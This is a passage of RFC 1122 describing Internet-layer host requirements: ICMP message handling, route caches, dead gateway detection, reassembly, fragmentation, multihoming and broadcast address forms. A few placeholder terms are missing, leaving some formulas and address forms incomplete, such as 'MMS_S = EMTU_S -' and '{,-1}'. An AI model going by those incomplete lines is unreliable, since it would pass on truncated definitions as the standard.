for sending an Echo Request and receiving an Echo Reply, for
diagnostic purposes.

An ICMP Echo Request destined to an IP broadcast or IP
multicast address MAY be silently discarded.

RFC1122 INTERNET LAYER October 1989

DISCUSSION:
This neutral provision results from a passionate debate
between those who feel that ICMP Echo to a broadcast
address provides a valuable diagnostic capability and
those who feel that misuse of this feature can too
easily create packet storms.

The IP source address in an ICMP Echo Reply MUST be the same
as the specific-destination address (defined in Section
3.2.1.3) of the corresponding ICMP Echo Request message.

Data received in an ICMP Echo Request MUST be entirely
included in the resulting Echo Reply. However, if sending
the Echo Reply requires intentional fragmentation that is
not implemented, the datagram MUST be truncated to maximum
transmission size (see Section 3.3.3) and sent.

Echo Reply messages MUST be passed to the ICMP user
interface, unless the corresponding Echo Request originated
in the IP layer.

If a Record Route and/or Time Stamp option is received in an
ICMP Echo Request, this option (these options) SHOULD be
updated to include the current host and included in the IP
header of the Echo Reply message, without "truncation".
Thus, the recorded route will be for the entire round trip.

If a Source Route option is received in an ICMP Echo
Request, the return route MUST be reversed and used as a
Source Route option for the Echo Reply message.

3.2.2.7 Information Request/Reply: RFC-792

A host SHOULD NOT implement these messages.

DISCUSSION:
The Information Request/Reply pair was intended to
support self-configuring systems such as diskless
workstations, to allow them to discover their IP
network numbers at boot time. However, the RARP and
BOOTP protocols provide better mechanisms for a host to
discover its own IP address.

3.2.2.8 Timestamp and Timestamp Reply: RFC-792

A host MAY implement Timestamp and Timestamp Reply. If they
are implemented, the following rules MUST be followed.

RFC1122 INTERNET LAYER October 1989

o The ICMP Timestamp server function returns a Timestamp
Reply to every Timestamp message that is received. If
this function is implemented, it SHOULD be designed for
minimum variability in delay (e.g., implemented in the
kernel to avoid delay in scheduling a user process).

The following cases for Timestamp are to be handled
according to the corresponding rules for ICMP Echo:

o An ICMP Timestamp Request message to an IP broadcast or
IP multicast address MAY be silently discarded.

o The IP source address in an ICMP Timestamp Reply MUST
be the same as the specific-destination address of the
corresponding Timestamp Request message.

o If a Source-route option is received in an ICMP Echo
Request, the return route MUST be reversed and used as
a Source Route option for the Timestamp Reply message.

o If a Record Route and/or Timestamp option is received
in a Timestamp Request, this (these) option(s) SHOULD
be updated to include the current host and included in
the IP header of the Timestamp Reply message.

o Incoming Timestamp Reply messages MUST be passed up to
the ICMP user interface.

The preferred form for a timestamp value (the "standard
value") is in units of milliseconds since midnight Universal
Time. However, it may be difficult to provide this value
with millisecond resolution. For example, many systems use
clocks that update only at line frequency, 50 or 60 times
per second. Therefore, some latitude is allowed in a
"standard value":

(a) A "standard value" MUST be updated at least 15 times
per second (i.e., at most the six low-order bits of the
value may be undefined).

(b) The accuracy of a "standard value" MUST approximate
that of operator-set CPU clocks, i.e., correct within a
few minutes.

RFC1122 INTERNET LAYER October 1989

3.2.2.9 Address Mask Request/Reply: RFC-950

A host MUST support the first, and MAY implement all three,
of the following methods for determining the address mask(s)
corresponding to its IP address(es):

(1) static configuration information;

(2) obtaining the address mask(s) dynamically as a side-
effect of the system initialization process (see
[INTRO:1]); and

(3) sending ICMP Address Mask Request(s) and receiving ICMP
Address Mask Reply(s).

The choice of method to be used in a particular host MUST be
configurable.

When method (3), the use of Address Mask messages, is
enabled, then:

(a) When it initializes, the host MUST broadcast an Address
Mask Request message on the connected network
corresponding to the IP address. It MUST retransmit
this message a small number of times if it does not
receive an immediate Address Mask Reply.

(b) Until it has received an Address Mask Reply, the host
SHOULD assume a mask appropriate for the address class
of the IP address, i.e., assume that the connected
network is not subnetted.

(c) The first Address Mask Reply message received MUST be
used to set the address mask corresponding to the
particular local IP address. This is true even if the
first Address Mask Reply message is "unsolicited", in
which case it will have been broadcast and may arrive
after the host has ceased to retransmit Address Mask
Requests. Once the mask has been set by an Address
Mask Reply, later Address Mask Reply messages MUST be
(silently) ignored.

Conversely, if Address Mask messages are disabled, then no
ICMP Address Mask Requests will be sent, and any ICMP
Address Mask Replies received for that local IP address MUST
be (silently) ignored.

A host SHOULD make some reasonableness check on any address

RFC1122 INTERNET LAYER October 1989

mask it installs; see IMPLEMENTATION section below.

A system MUST NOT send an Address Mask Reply unless it is an
authoritative agent for address masks. An authoritative
agent may be a host or a gateway, but it MUST be explicitly
configured as a address mask agent. Receiving an address
mask via an Address Mask Reply does not give the receiver
authority and MUST NOT be used as the basis for issuing
Address Mask Replies.

With a statically configured address mask, there SHOULD be
an additional configuration flag that determines whether the
host is to act as an authoritative agent for this mask,
i.e., whether it will answer Address Mask Request messages
using this mask.

If it is configured as an agent, the host MUST broadcast an
Address Mask Reply for the mask on the appropriate interface
when it initializes.

See "System Initialization" in [INTRO:1] for more
information about the use of Address Mask Request/Reply
messages.

DISCUSSION
Hosts that casually send Address Mask Replies with
invalid address masks have often been a serious
nuisance. To prevent this, Address Mask Replies ought
to be sent only by authoritative agents that have been
selected by explicit administrative action.

When an authoritative agent receives an Address Mask
Request message, it will send a unicast Address Mask
Reply to the source IP address. If the network part of
this address is zero (see (a) and (b) in 3.2.1.3), the
Reply will be broadcast.

Getting no reply to its Address Mask Request messages,
a host will assume there is no agent and use an
unsubnetted mask, but the agent may be only temporarily
unreachable. An agent will broadcast an unsolicited
Address Mask Reply whenever it initializes, in order to
update the masks of all hosts that have initialized in
the meantime.

IMPLEMENTATION:
The following reasonableness check on an address mask
is suggested: the mask is not all 1 bits, and it is

RFC1122 INTERNET LAYER October 1989

either zero or else the 8 highest-order bits are on.

3.2.3 Internet Group Management Protocol IGMP

IGMP [IP:4] is a protocol used between hosts and gateways on a
single network to establish hosts' membership in particular
multicast groups. The gateways use this information, in
conjunction with a multicast routing protocol, to support IP
multicasting across the Internet.

At this time, implementation of IGMP is OPTIONAL; see Section
3.3.7 for more information. Without IGMP, a host can still
participate in multicasting local to its connected networks.

3.3 SPECIFIC ISSUES

3.3.1 Routing Outbound Datagrams

The IP layer chooses the correct next hop for each datagram it
sends. If the destination is on a connected network, the
datagram is sent directly to the destination host; otherwise,
it has to be routed to a gateway on a connected network.

3.3.1.1 Local/Remote Decision

To decide if the destination is on a connected network, the
following algorithm MUST be used [see IP:3]:

(a) The address mask (particular to a local IP address for
a multihomed host) is a 32-bit mask that selects the
network number and subnet number fields of the
corresponding IP address.

(b) If the IP destination address bits extracted by the
address mask match the IP source address bits extracted
by the same mask, then the destination is on the
corresponding connected network, and the datagram is to
be transmitted directly to the destination host.

(c) If not, then the destination is accessible only through
a gateway. Selection of a gateway is described below
(3.3.1.2).

A special-case destination address is handled as follows:

* For a limited broadcast or a multicast address, simply
pass the datagram to the link layer for the appropriate
interface.

RFC1122 INTERNET LAYER October 1989

* For a (network or subnet) directed broadcast, the
datagram can use the standard routing algorithms.

The host IP layer MUST operate correctly in a minimal
network environment, and in particular, when there are no
gateways. For example, if the IP layer of a host insists on
finding at least one gateway to initialize, the host will be
unable to operate on a single isolated broadcast net.

3.3.1.2 Gateway Selection

To efficiently route a series of datagrams to the same
destination, the source host MUST keep a "route cache" of
mappings to next-hop gateways. A host uses the following
basic algorithm on this cache to route a datagram; this
algorithm is designed to put the primary routing burden on
the gateways [IP:11].

(a) If the route cache contains no information for a
particular destination, the host chooses a "default"
gateway and sends the datagram to it. It also builds a
corresponding Route Cache entry.

(b) If that gateway is not the best next hop to the
destination, the gateway will forward the datagram to
the best next-hop gateway and return an ICMP Redirect
message to the source host.

(c) When it receives a Redirect, the host updates the
next-hop gateway in the appropriate route cache entry,
so later datagrams to the same destination will go
directly to the best gateway.

Since the subnet mask appropriate to the destination address
is generally not known, a Network Redirect message SHOULD be
treated identically to a Host Redirect message; i.e., the
cache entry for the destination host (only) would be updated
(or created, if an entry for that host did not exist) for
the new gateway.

DISCUSSION:
This recommendation is to protect against gateways that
erroneously send Network Redirects for a subnetted
network, in violation of the gateway requirements
[INTRO:2].

When there is no route cache entry for the destination host
address (and the destination is not on the connected

RFC1122 INTERNET LAYER October 1989

network), the IP layer MUST pick a gateway from its list of
"default" gateways. The IP layer MUST support multiple
default gateways.

As an extra feature, a host IP layer MAY implement a table
of "static routes". Each such static route MAY include a
flag specifying whether it may be overridden by ICMP
Redirects.

DISCUSSION:
A host generally needs to know at least one default
gateway to get started. This information can be
obtained from a configuration file or else from the
host startup sequence, e.g., the BOOTP protocol (see
[INTRO:1]).

It has been suggested that a host can augment its list
of default gateways by recording any new gateways it
learns about. For example, it can record every gateway
to which it is ever redirected. Such a feature, while
possibly useful in some circumstances, may cause
problems in other cases (e.g., gateways are not all
equal), and it is not recommended.

A static route is typically a particular preset mapping
from destination host or network into a particular
next-hop gateway; it might also depend on the Type-of-
Service (see next section). Static routes would be set
up by system administrators to override the normal
automatic routing mechanism, to handle exceptional
situations. However, any static routing information is
a potential source of failure as configurations change
or equipment fails.

3.3.1.3 Route Cache

Each route cache entry needs to include the following
fields:

(1) Local IP address (for a multihomed host)

(2) Destination IP address

(3) Type(s)-of-Service

(4) Next-hop gateway IP address

Field (2) MAY be the full IP address of the destination

RFC1122 INTERNET LAYER October 1989

host, or only the destination network number. Field (3),
the TOS, SHOULD be included.

See Section 3.3.4.2 for a discussion of the implications of
multihoming for the lookup procedure in this cache.

DISCUSSION:
Including the Type-of-Service field in the route cache
and considering it in the host route algorithm will
provide the necessary mechanism for the future when
Type-of-Service routing is commonly used in the
Internet. See Section 3.2.1.6.

Each route cache entry defines the endpoints of an
Internet path. Although the connecting path may change
dynamically in an arbitrary way, the transmission
characteristics of the path tend to remain
approximately constant over a time period longer than a
single typical host-host transport connection.
Therefore, a route cache entry is a natural place to
cache data on the properties of the path. Examples of
such properties might be the maximum unfragmented
datagram size (see Section 3.3.3), or the average
round-trip delay measured by a transport protocol.
This data will generally be both gathered and used by a
higher layer protocol, e.g., by TCP, or by an
application using UDP. Experiments are currently in
progress on caching path properties in this manner.

There is no consensus on whether the route cache should
be keyed on destination host addresses alone, or allow
both host and network addresses. Those who favor the
use of only host addresses argue that:

(1) As required in Section 3.3.1.2, Redirect messages
will generally result in entries keyed on
destination host addresses; the simplest and most
general scheme would be to use host addresses
always.

(2) The IP layer may not always know the address mask
for a network address in a complex subnetted
environment.

(3) The use of only host addresses allows the
destination address to be used as a pure 32-bit
number, which may allow the Internet architecture
to be more easily extended in the future without

RFC1122 INTERNET LAYER October 1989

any change to the hosts.

The opposing view is that allowing a mixture of
destination hosts and networks in the route cache:

(1) Saves memory space.

(2) Leads to a simpler data structure, easily
combining the cache with the tables of default and
static routes (see below).

(3) Provides a more useful place to cache path
properties, as discussed earlier.

IMPLEMENTATION:
The cache needs to be large enough to include entries
for the maximum number of destination hosts that may be
in use at one time.

A route cache entry may also include control
information used to choose an entry for replacement.
This might take the form of a "recently used" bit, a
use count, or a last-used timestamp, for example. It
is recommended that it include the time of last
modification of the entry, for diagnostic purposes.

An implementation may wish to reduce the overhead of
scanning the route cache for every datagram to be
transmitted. This may be accomplished with a hash
table to speed the lookup, or by giving a connection-
oriented transport protocol a "hint" or temporary
handle on the appropriate cache entry, to be passed to
the IP layer with each subsequent datagram.

Although we have described the route cache, the lists
of default gateways, and a table of static routes as
conceptually distinct, in practice they may be combined
into a single "routing table" data structure.

3.3.1.4 Dead Gateway Detection

The IP layer MUST be able to detect the failure of a "next-
hop" gateway that is listed in its route cache and to choose
an alternate gateway (see Section 3.3.1.5).

Dead gateway detection is covered in some detail in RFC-816
[IP:11]. Experience to date has not produced a complete

RFC1122 INTERNET LAYER October 1989

algorithm which is totally satisfactory, though it has
identified several forbidden paths and promising techniques.

* A particular gateway SHOULD NOT be used indefinitely in
the absence of positive indications that it is
functioning.

* Active probes such as "pinging" (i.e., using an ICMP
Echo Request/Reply exchange) are expensive and scale
poorly. In particular, hosts MUST NOT actively check
the status of a first-hop gateway by simply pinging the
gateway continuously.

* Even when it is the only effective way to verify a
gateway's status, pinging MUST be used only when
traffic is being sent to the gateway and when there is
no other positive indication to suggest that the
gateway is functioning.

* To avoid pinging, the layers above and/or below the
Internet layer SHOULD be able to give "advice" on the
status of route cache entries when either positive
(gateway OK) or negative (gateway dead) information is
available.

DISCUSSION:
If an implementation does not include an adequate
mechanism for detecting a dead gateway and re-routing,
a gateway failure may cause datagrams to apparently
vanish into a "black hole". This failure can be
extremely confusing for users and difficult for network
personnel to debug.

The dead-gateway detection mechanism must not cause
unacceptable load on the host, on connected networks,
or on first-hop gateway(s). The exact constraints on
the timeliness of dead gateway detection and on
acceptable load may vary somewhat depending on the
nature of the host's mission, but a host generally
needs to detect a failed first-hop gateway quickly
enough that transport-layer connections will not break
before an alternate gateway can be selected.

Passing advice from other layers of the protocol stack
complicates the interfaces between the layers, but it
is the preferred approach to dead gateway detection.
Advice can come from almost any part of the IP/TCP

RFC1122 INTERNET LAYER October 1989

architecture, but it is expected to come primarily from
the transport and link layers. Here are some possible
sources for gateway advice:

o TCP or any connection-oriented transport protocol
should be able to give negative advice, e.g.,
triggered by excessive retransmissions.

o TCP may give positive advice when (new) data is
acknowledged. Even though the route may be
asymmetric, an ACK for new data proves that the
acknowleged data must have been transmitted
successfully.

o An ICMP Redirect message from a particular gateway
should be used as positive advice about that
gateway.

o Link-layer information that reliably detects and
reports host failures (e.g., ARPANET Destination
Dead messages) should be used as negative advice.

o Failure to ARP or to re-validate ARP mappings may
be used as negative advice for the corresponding
IP address.

o Packets arriving from a particular link-layer
address are evidence that the system at this
address is alive. However, turning this
information into advice about gateways requires
mapping the link-layer address into an IP address,
and then checking that IP address against the
gateways pointed to by the route cache. This is
probably prohibitively inefficient.

Note that positive advice that is given for every
datagram received may cause unacceptable overhead in
the implementation.

While advice might be passed using required arguments
in all interfaces to the IP layer, some transport and
application layer protocols cannot deduce the correct
advice. These interfaces must therefore allow a
neutral value for advice, since either always-positive
or always-negative advice leads to incorrect behavior.

There is another technique for dead gateway detection
that has been commonly used but is not recommended.

RFC1122 INTERNET LAYER October 1989

This technique depends upon the host passively
receiving ("wiretapping") the Interior Gateway Protocol
(IGP) datagrams that the gateways are broadcasting to
each other. This approach has the drawback that a host
needs to recognize all the interior gateway protocols
that gateways may use (see [INTRO:2]). In addition, it
only works on a broadcast network.

At present, pinging (i.e., using ICMP Echo messages) is
the mechanism for gateway probing when absolutely
required. A successful ping guarantees that the
addressed interface and its associated machine are up,
but it does not guarantee that the machine is a gateway
as opposed to a host. The normal inference is that if
a Redirect or other evidence indicates that a machine
was a gateway, successful pings will indicate that the
machine is still up and hence still a gateway.
However, since a host silently discards packets that a
gateway would forward or redirect, this assumption
could sometimes fail. To avoid this problem, a new
ICMP message under development will ask "are you a
gateway?"

IMPLEMENTATION:
The following specific algorithm has been suggested:

o Associate a "reroute timer" with each gateway
pointed to by the route cache. Initialize the
timer to a value Tr, which must be small enough to
allow detection of a dead gateway before transport
connections time out.

o Positive advice would reset the reroute timer to
Tr. Negative advice would reduce or zero the
reroute timer.

o Whenever the IP layer used a particular gateway to
route a datagram, it would check the corresponding
reroute timer. If the timer had expired (reached
zero), the IP layer would send a ping to the
gateway, followed immediately by the datagram.

o The ping (ICMP Echo) would be sent again if
necessary, up to N times. If no ping reply was
received in N tries, the gateway would be assumed
to have failed, and a new first-hop gateway would
be chosen for all cache entries pointing to the
failed gateway.

RFC1122 INTERNET LAYER October 1989

Note that the size of Tr is inversely related to the
amount of advice available. Tr should be large enough
to insure that:

* Any pinging will be at a low level (e.g., <10%) of
all packets sent to a gateway from the host, AND

* pinging is infrequent (e.g., every 3 minutes)

Since the recommended algorithm is concerned with the
gateways pointed to by route cache entries, rather than
the cache entries themselves, a two level data
structure (perhaps coordinated with ARP or similar
caches) may be desirable for implementing a route
cache.

3.3.1.5 New Gateway Selection

If the failed gateway is not the current default, the IP
layer can immediately switch to a default gateway. If it is
the current default that failed, the IP layer MUST select a
different default gateway (assuming more than one default is
known) for the failed route and for establishing new routes.

DISCUSSION:
When a gateway does fail, the other gateways on the
connected network will learn of the failure through
some inter-gateway routing protocol. However, this
will not happen instantaneously, since gateway routing
protocols typically have a settling time of 30-60
seconds. If the host switches to an alternative
gateway before the gateways have agreed on the failure,
the new target gateway will probably forward the
datagram to the failed gateway and send a Redirect back
to the host pointing to the failed gateway (!). The
result is likely to be a rapid oscillation in the
contents of the host's route cache during the gateway
settling period. It has been proposed that the dead-
gateway logic should include some hysteresis mechanism
to prevent such oscillations. However, experience has
not shown any harm from such oscillations, since
service cannot be restored to the host until the
gateways' routing information does settle down.

IMPLEMENTATION:
One implementation technique for choosing a new default
gateway is to simply round-robin among the default
gateways in the host's list. Another is to rank the

RFC1122 INTERNET LAYER October 1989

gateways in priority order, and when the current
default gateway is not the highest priority one, to
"ping" the higher-priority gateways slowly to detect
when they return to service. This pinging can be at a
very low rate, e.g., 0.005 per second.

3.3.1.6 Initialization

The following information MUST be configurable:

(1) IP address(es).

(2) Address mask(s).

(3) A list of default gateways, with a preference level.

A manual method of entering this configuration data MUST be
provided. In addition, a variety of methods can be used to
determine this information dynamically; see the section on
"Host Initialization" in [INTRO:1].

DISCUSSION:
Some host implementations use "wiretapping" of gateway
protocols on a broadcast network to learn what gateways
exist. A standard method for default gateway discovery
is under development.

3.3.2 Reassembly

The IP layer MUST implement reassembly of IP datagrams.

We designate the largest datagram size that can be reassembled
by EMTU_R ("Effective MTU to receive"); this is sometimes
called the "reassembly buffer size". EMTU_R MUST be greater
than or equal to 576, SHOULD be either configurable or
indefinite, and SHOULD be greater than or equal to the MTU of
the connected network(s).

DISCUSSION:
A fixed EMTU_R limit should not be built into the code
because some application layer protocols require EMTU_R
values larger than 576.

IMPLEMENTATION:
An implementation may use a contiguous reassembly buffer
for each datagram, or it may use a more complex data
structure that places no definite limit on the reassembled
datagram size; in the latter case, EMTU_R is said to be

RFC1122 INTERNET LAYER October 1989

"indefinite".

Logically, reassembly is performed by simply copying each
fragment into the packet buffer at the proper offset.
Note that fragments may overlap if successive
retransmissions use different packetizing but the same
reassembly Id.

The tricky part of reassembly is the bookkeeping to
determine when all bytes of the datagram have been
reassembled. We recommend Clark's algorithm [IP:10] that
requires no additional data space for the bookkeeping.
However, note that, contrary to [IP:10], the first
fragment header needs to be saved for inclusion in a
possible ICMP Time Exceeded (Reassembly Timeout) message.

There MUST be a mechanism by which the transport layer can
learn MMS_R, the maximum message size that can be received and
reassembled in an IP datagram (see GET_MAXSIZES calls in
Section 3.4). If EMTU_R is not indefinite, then the value of
MMS_R is given by:

MMS_R = EMTU_R - 20

since 20 is the minimum size of an IP header.

There MUST be a reassembly timeout. The reassembly timeout
value SHOULD be a fixed value, not set from the remaining TTL.
It is recommended that the value lie between 60 seconds and 120
seconds. If this timeout expires, the partially-reassembled
datagram MUST be discarded and an ICMP Time Exceeded message
sent to the source host (if fragment zero has been received).

DISCUSSION:
The IP specification says that the reassembly timeout
should be the remaining TTL from the IP header, but this
does not work well because gateways generally treat TTL as
a simple hop count rather than an elapsed time. If the
reassembly timeout is too small, datagrams will be
discarded unnecessarily, and communication may fail. The
timeout needs to be at least as large as the typical
maximum delay across the Internet. A realistic minimum
reassembly timeout would be 60 seconds.

It has been suggested that a cache might be kept of
round-trip times measured by transport protocols for
various destinations, and that these values might be used
to dynamically determine a reasonable reassembly timeout

RFC1122 INTERNET LAYER October 1989

value. Further investigation of this approach is
required.

If the reassembly timeout is set too high, buffer
resources in the receiving host will be tied up too long,
and the MSL (Maximum Segment Lifetime) [TCP:1] will be
larger than necessary. The MSL controls the maximum rate
at which fragmented datagrams can be sent using distinct
values of the 16-bit Ident field; a larger MSL lowers the
maximum rate. The TCP specification [TCP:1] arbitrarily
assumes a value of 2 minutes for MSL. This sets an upper
limit on a reasonable reassembly timeout value.

3.3.3 Fragmentation

Optionally, the IP layer MAY implement a mechanism to fragment
outgoing datagrams intentionally.

We designate by EMTU_S ("Effective MTU for sending") the
maximum IP datagram size that may be sent, for a particular
combination of IP source and destination addresses and perhaps
TOS.

A host MUST implement a mechanism to allow the transport layer
to learn MMS_S, the maximum transport-layer message size that
may be sent for a given {source, destination, TOS} triplet (see
GET_MAXSIZES call in Section 3.4). If no local fragmentation
is performed, the value of MMS_S will be:

MMS_S = EMTU_S -

and EMTU_S must be less than or equal to the MTU of the network
interface corresponding to the source address of the datagram.
Note that in this equation will be 20, unless
the IP reserves space to insert IP options for its own purposes
in addition to any options inserted by the transport layer.

A host that does not implement local fragmentation MUST ensure
that the transport layer (for TCP) or the application layer
(for UDP) obtains MMS_S from the IP layer and does not send a
datagram exceeding MMS_S in size.

It is generally desirable to avoid local fragmentation and to
choose EMTU_S low enough to avoid fragmentation in any gateway
along the path. In the absence of actual knowledge of the
minimum MTU along the path, the IP layer SHOULD use
EMTU_S <= 576 whenever the destination address is not on a
connected network, and otherwise use the connected network's

RFC1122 INTERNET LAYER October 1989

MTU.

The MTU of each physical interface MUST be configurable.

A host IP layer implementation MAY have a configuration flag
"All-Subnets-MTU", indicating that the MTU of the connected
network is to be used for destinations on different subnets
within the same network, but not for other networks. Thus,
this flag causes the network class mask, rather than the subnet
address mask, to be used to choose an EMTU_S. For a multihomed
host, an "All-Subnets-MTU" flag is needed for each network
interface.

DISCUSSION:
Picking the correct datagram size to use when sending data
is a complex topic [IP:9].

(a) In general, no host is required to accept an IP
datagram larger than 576 bytes (including header and
data), so a host must not send a larger datagram
without explicit knowledge or prior arrangement with
the destination host. Thus, MMS_S is only an upper
bound on the datagram size that a transport protocol
may send; even when MMS_S exceeds 556, the transport
layer must limit its messages to 556 bytes in the
absence of other knowledge about the destination
host.

(b) Some transport protocols (e.g., TCP) provide a way to
explicitly inform the sender about the largest
datagram the other end can receive and reassemble
[IP:7]. There is no corresponding mechanism in the
IP layer.

A transport protocol that assumes an EMTU_R larger
than 576 (see Section 3.3.2), can send a datagram of
this larger size to another host that implements the
same protocol.

(c) Hosts should ideally limit their EMTU_S for a given
destination to the minimum MTU of all the networks
along the path, to avoid any fragmentation. IP
fragmentation, while formally correct, can create a
serious transport protocol performance problem,
because loss of a single fragment means all the
fragments in the segment must be retransmitted
[IP:9].

RFC1122 INTERNET LAYER October 1989

Since nearly all networks in the Internet currently
support an MTU of 576 or greater, we strongly recommend
the use of 576 for datagrams sent to non-local networks.

It has been suggested that a host could determine the MTU
over a given path by sending a zero-offset datagram
fragment and waiting for the receiver to time out the
reassembly (which cannot complete!) and return an ICMP
Time Exceeded message. This message would include the
largest remaining fragment header in its body. More
direct mechanisms are being experimented with, but have
not yet been adopted (see e.g., RFC-1063).

3.3.4 Local Multihoming

3.3.4.1 Introduction

A multihomed host has multiple IP addresses, which we may
think of as "logical interfaces". These logical interfaces
may be associated with one or more physical interfaces, and
these physical interfaces may be connected to the same or
different networks.

Here are some important cases of multihoming:

(a) Multiple Logical Networks

The Internet architects envisioned that each physical
network would have a single unique IP network (or
subnet) number. However, LAN administrators have
sometimes found it useful to violate this assumption,
operating a LAN with multiple logical networks per
physical connected network.

If a host connected to such a physical network is
configured to handle traffic for each of N different
logical networks, then the host will have N logical
interfaces. These could share a single physical
interface, or might use N physical interfaces to the
same network.

(b) Multiple Logical Hosts

When a host has multiple IP addresses that all have the
same part (and the same number> part, if any), the logical interfaces are known
as "logical hosts". These logical interfaces might
share a single physical interface or might use separate

RFC1122 INTERNET LAYER October 1989

physical interfaces to the same physical network.

(c) Simple Multihoming

In this case, each logical interface is mapped into a
separate physical interface and each physical interface
is connected to a different physical network. The term
"multihoming" was originally applied only to this case,
but it is now applied more generally.

A host with embedded gateway functionality will
typically fall into the simple multihoming case. Note,
however, that a host may be simply multihomed without
containing an embedded gateway, i.e., without
forwarding datagrams from one connected network to
another.

This case presents the most difficult routing problems.
The choice of interface (i.e., the choice of first-hop
network) may significantly affect performance or even
reachability of remote parts of the Internet.

Finally, we note another possibility that is NOT
multihoming: one logical interface may be bound to multiple
physical interfaces, in order to increase the reliability or
throughput between directly connected machines by providing
alternative physical paths between them. For instance, two
systems might be connected by multiple point-to-point links.
We call this "link-layer multiplexing". With link-layer
multiplexing, the protocols above the link layer are unaware
that multiple physical interfaces are present; the link-
layer device driver is responsible for multiplexing and
routing packets across the physical interfaces.

In the Internet protocol architecture, a transport protocol
instance ("entity") has no address of its own, but instead
uses a single Internet Protocol (IP) address. This has
implications for the IP, transport, and application layers,
and for the interfaces between them. In particular, the
application software may have to be aware of the multiple IP
addresses of a multihomed host; in other cases, the choice
can be made within the network software.

3.3.4.2 Multihoming Requirements

The following general rules apply to the selection of an IP
source address for sending a datagram from a multihomed

RFC1122 INTERNET LAYER October 1989

host.

(1) If the datagram is sent in response to a received
datagram, the source address for the response SHOULD be
the specific-destination address of the request. See
Sections 4.1.3.5 and 4.2.3.7 and the "General Issues"
section of [INTRO:1] for more specific requirements on
higher layers.

Otherwise, a source address must be selected.

(2) An application MUST be able to explicitly specify the
source address for initiating a connection or a
request.

(3) In the absence of such a specification, the networking
software MUST choose a source address. Rules for this
choice are described below.

There are two key requirement issues related to multihoming:

(A) A host MAY silently discard an incoming datagram whose
destination address does not correspond to the physical
interface through which it is received.

(B) A host MAY restrict itself to sending (non-source-
routed) IP datagrams only through the physical
interface that corresponds to the IP source address of
the datagrams.

DISCUSSION:
Internet host implementors have used two different
conceptual models for multihoming, briefly summarized
in the following discussion. This document takes no
stand on which model is preferred; each seems to have a
place. This ambivalence is reflected in the issues (A)
and (B) being optional.

o Strong ES Model

The Strong ES (End System, i.e., host) model
emphasizes the host/gateway (ES/IS) distinction,
and would therefore substitute MUST for MAY in
issues (A) and (B) above. It tends to model a
multihomed host as a set of logical hosts within
the same physical host.

RFC1122 INTERNET LAYER October 1989

With respect to (A), proponents of the Strong ES
model note that automatic Internet routing
mechanisms could not route a datagram to a
physical interface that did not correspond to the
destination address.

Under the Strong ES model, the route computation
for an outgoing datagram is the mapping:

route(src IP addr, dest IP addr, TOS)
-> gateway

Here the source address is included as a parameter
in order to select a gateway that is directly
reachable on the corresponding physical interface.
Note that this model logically requires that in
general there be at least one default gateway, and
preferably multiple defaults, for each IP source
address.

o Weak ES Model

This view de-emphasizes the ES/IS distinction, and
would therefore substitute MUST NOT for MAY in
issues (A) and (B). This model may be the more
natural one for hosts that wiretap gateway routing
protocols, and is necessary for hosts that have
embedded gateway functionality.

The Weak ES Model may cause the Redirect mechanism
to fail. If a datagram is sent out a physical
interface that does not correspond to the
destination address, the first-hop gateway will
not realize when it needs to send a Redirect. On
the other hand, if the host has embedded gateway
functionality, then it has routing information
without listening to Redirects.

In the Weak ES model, the route computation for an
outgoing datagram is the mapping:

route(dest IP addr, TOS) -> gateway, interface

RFC1122 INTERNET LAYER October 1989

3.3.4.3 Choosing a Source Address

DISCUSSION:
When it sends an initial connection request (e.g., a
TCP "SYN" segment) or a datagram service request (e.g.,
a UDP-based query), the transport layer on a multihomed
host needs to know which source address to use. If the
application does not specify it, the transport layer
must ask the IP layer to perform the conceptual
mapping:

GET_SRCADDR(remote IP addr, TOS)
-> local IP address

Here TOS is the Type-of-Service value (see Section
3.2.1.6), and the result is the desired source address.
The following rules are suggested for implementing this
mapping:

(a) If the remote Internet address lies on one of the
(sub-) nets to which the host is directly
connected, a corresponding source address may be
chosen, unless the corresponding interface is
known to be down.

(b) The route cache may be consulted, to see if there
is an active route to the specified destination
network through any network interface; if so, a
local IP address corresponding to that interface
may be chosen.

(c) The table of static routes, if any (see Section
3.3.1.2) may be similarly consulted.

(d) The default gateways may be consulted. If these
gateways are assigned to different interfaces, the
interface corresponding to the gateway with the
highest preference may be chosen.

In the future, there may be a defined way for a
multihomed host to ask the gateways on all connected
networks for advice about the best network to use for a
given destination.

IMPLEMENTATION:
It will be noted that this process is essentially the
same as datagram routing (see Section 3.3.1), and
therefore hosts may be able to combine the

RFC1122 INTERNET LAYER October 1989

implementation of the two functions.

3.3.5 Source Route Forwarding

Subject to restrictions given below, a host MAY be able to act
as an intermediate hop in a source route, forwarding a source-
routed datagram to the next specified hop.

However, in performing this gateway-like function, the host
MUST obey all the relevant rules for a gateway forwarding
source-routed datagrams [INTRO:2]. This includes the following
specific provisions, which override the corresponding host
provisions given earlier in this document:

(A) TTL (ref. Section 3.2.1.7)

The TTL field MUST be decremented and the datagram perhaps
discarded as specified for a gateway in [INTRO:2].

(B) ICMP Destination Unreachable (ref. Section 3.2.2.1)

A host MUST be able to generate Destination Unreachable
messages with the following codes:

4 (Fragmentation Required but DF Set) when a source-
routed datagram cannot be fragmented to fit into the
target network;

5 (Source Route Failed) when a source-routed datagram
cannot be forwarded, e.g., because of a routing
problem or because the next hop of a strict source
route is not on a connected network.

(C) IP Source Address (ref. Section 3.2.1.3)

A source-routed datagram being forwarded MAY (and normally
will) have a source address that is not one of the IP
addresses of the forwarding host.

(D) Record Route Option (ref. Section 3.2.1.8d)

A host that is forwarding a source-routed datagram
containing a Record Route option MUST update that option,
if it has room.

(E) Timestamp Option (ref. Section 3.2.1.8e)

A host that is forwarding a source-routed datagram

RFC1122 INTERNET LAYER October 1989

containing a Timestamp Option MUST add the current
timestamp to that option, according to the rules for this
option.

To define the rules restricting host forwarding of source-
routed datagrams, we use the term "local source-routing" if the
next hop will be through the same physical interface through
which the datagram arrived; otherwise, it is "non-local
source-routing".

o A host is permitted to perform local source-routing
without restriction.

o A host that supports non-local source-routing MUST have a
configurable switch to disable forwarding, and this switch
MUST default to disabled.

o The host MUST satisfy all gateway requirements for
configurable policy filters [INTRO:2] restricting non-
local forwarding.

If a host receives a datagram with an incomplete source route
but does not forward it for some reason, the host SHOULD return
an ICMP Destination Unreachable (code 5, Source Route Failed)
message, unless the datagram was itself an ICMP error message.

3.3.6 Broadcasts

Section 3.2.1.3 defined the four standard IP broadcast address
forms:

Limited Broadcast: {-1, -1}

Directed Broadcast: {,-1}

Subnet Directed Broadcast:
{,,-1}

All-Subnets Directed Broadcast: {,-1,-1}

A host MUST recognize any of these forms in the destination
address of an incoming datagram.

There is a class of hosts* that use non-standard broadcast
